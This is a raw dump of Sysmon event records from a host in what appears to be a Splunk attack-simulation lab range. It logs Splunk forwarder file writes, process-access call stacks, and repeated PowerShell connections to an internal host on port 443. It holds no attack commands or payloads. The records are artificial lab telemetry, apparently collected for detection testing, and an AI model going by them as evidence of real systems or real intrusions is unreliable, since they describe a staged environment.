AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9A6F0C8780F2E40226994E48DDA3F51,SHA256=7F1203D6B78E099CD5335E43649330A058DBF3C75466B4E836FA3F852E1AB877,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.026{B81B27B7-9F89-6140-5656-04000000C801}54804984C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:39.977{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CF38580D836B52855E5B7088BA568F3,SHA256=1588BA5A98576072A656DCE07EB525E36D70BC3E71A6747518CDCF14261E7301,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:09.921{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50400-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:08.822{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50399-false10.0.1.12-8000- 23542300x800000000000000036496361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:39.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9915C0C81B1A594E640705DBE9158861,SHA256=A5C575A0BCA50357371C3DB3C0F0F55259DEA4EBD895D44AAF57467048BD9DF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:39.241{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1F210895F9E39FCB4E4B5652C8C2BD,SHA256=6E664E7190B4EC21F55219AE7F68A5C647688525CBB62A05736555D20E9640F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.994{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-9F8A-6140-5856-04000000C801}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.994{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496357Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.994{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.994{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496355Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.994{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.994{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-9F8A-6140-5856-04000000C801}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.994{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-9F8A-6140-5856-04000000C801}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:38.973{B81B27B7-9F8A-6140-5856-04000000C801}2020C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:40.255{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6636D38F05CEF9E3E6FA9126DFCD55A3,SHA256=90BB87C386226F28EC10832264DB47F8B0BF928D9F15128A6A9FCDD08848DC84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:41.274{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=097E868F3151D39A4CA07F60092CE355,SHA256=108AC3E21F6B897476C432EA45E809C2F00B7854FED7549A6391D4328513EA6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:42.291{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=280CAFC3873CA158269FFB2E5D94E87F,SHA256=22AA84F0320D515A21496F9640179BC5733BFAE59B54A6D9226E324C7955C2A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:43.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5369F311BCFA0E41DBC7C2997CD1D987,SHA256=B1743AE1C404E045E9E8D8DB3D7E328662DA2B38F23C2EA082608F35E5CFADA8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:14.932{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50402-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036496371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:14.831{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50401-false10.0.1.12-8000- 23542300x800000000000000036496370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:44.335{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=265EB80307D9DD1788CA65C4A7E11929,SHA256=CD657CA295EB833ACD0ABF3D0C7E23AD08E0749889A330A94576EE66DEC1BA54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:44.270{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=85263D5E647639DDFDC58E8FC3EFD838,SHA256=2D6D71BE68CE858AFE1070E496386E135FB9B8CD45C64222F67FB93E73CB5B7E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:45.350{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4929AE37F728D0336C99F2061EF1AECA,SHA256=B5159AA27E0D03BFA70BF38E7F35C4B029BC73E88F739BE710E133B708B8058C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:46.366{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BCBC9C47F301B1E026DE77569EFA105,SHA256=B152AE8391C0E277B6F41C7E00B0FEB3DAC2C8E280E1413769A4A253664E7F13,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:47.385{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A3A1CC1F6B4DC292D2AECAB46793E08,SHA256=1C3EC1DA36BA22CEA5D67FA79E392BE530D8DC965E883E9EC245F16D08A41A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:48.415{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9474CB052BDDF79DC870E808809B930D,SHA256=4E14D7E604AE79F55B4B2FF2A45B57C23FB5591718B8DF75214F6D6F5975C620,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:19.942{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50403-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:49.445{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0BCFCD88BB6E496D54D55B8668824CB,SHA256=8524984A057986DA98B3BBD811C350475F1B50AD97076813F3176B9534FF3E3F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:49.398{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3E65B2BCAD674D96BD8E80EF98E687D1,SHA256=A21972F37E638959A2A9FE3614C7CFEAC64178358C53B74BD6D1E496D548A2EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:20.840{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50404-false10.0.1.12-8000- 23542300x800000000000000036496380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:50.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38B65DD26AF99B1A618A0CD9F520E315,SHA256=9F60F747DEFC6A65F877E8C7F234EE21CEEA3B0EF5554D7069D57D426F50AA49,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:51.496{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DFC52E354C88589933D80BB9ABA5A86,SHA256=287061F09FB66626D1084668952733554BE98C80A3EA9404D55E18D6B2C3EE64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:52.542{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A37E2D69CAC0B03D9E43B02980E2FCCF,SHA256=E7A8A4565A68858BF95AFEBF453055DA36D4F0C192FCC4B42F3E6B25D8BB6762,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:12:23.959{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50405-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:53.559{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48756650D7279E11BBD8218E5311048E,SHA256=B42243BAD2FF6034B8C3F670CC4D6706AD979443F1C25E2C1CBA157B460AA545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:53.279{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2BDA7E01442E384A40D0823EB2ED903B,SHA256=8EE34D475B85CC031EB5B061D37C52264FFB11F6F9DCAACCDC124D9756B3B514,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:54.578{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3289CD0E78EDD6FBF9315E5C93312F,SHA256=9566A5EEC09264C3A3F18784B167A56670382E9218848D3790B6121E3B8ED480,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:55.593{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9752FB4ADFA3CED5D36F25501D5B6AF,SHA256=8E4A142DFF4A35AFDC2EE88B1E383CE745E82207F3B34B68A46A4A7182ACB880,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:56.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A3D98DECAA8261989F3F035581724D1,SHA256=DFB1FDC9482D873441D3D369A779769B26EE6180F72BCC01C7993FA45683C097,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:56.261{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a2dbe58.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:57.622{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C509230508697F8D99D8BCE583E5394,SHA256=11860514546674F7077DF94B71F56DBE622F67D1DDA3F56A493FAC8D6CE6BF9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:57.553{B81B27B7-4012-611D-0D00-00000000C801}7922340C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:57.553{B81B27B7-4012-611D-0D00-00000000C801}7922340C:\Windows\system32\svchost.exe{B81B27B7-429F-611D-0601-00000000C801}5536C:\Windows\system32\ServerManager.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:11:58.636{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75A528A63B94CA5B71C93EAAD61917FC,SHA256=141DBA80DF12F70C10A5B806646A06A8BDF675122D6FB23883093CFCD6E6A491,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 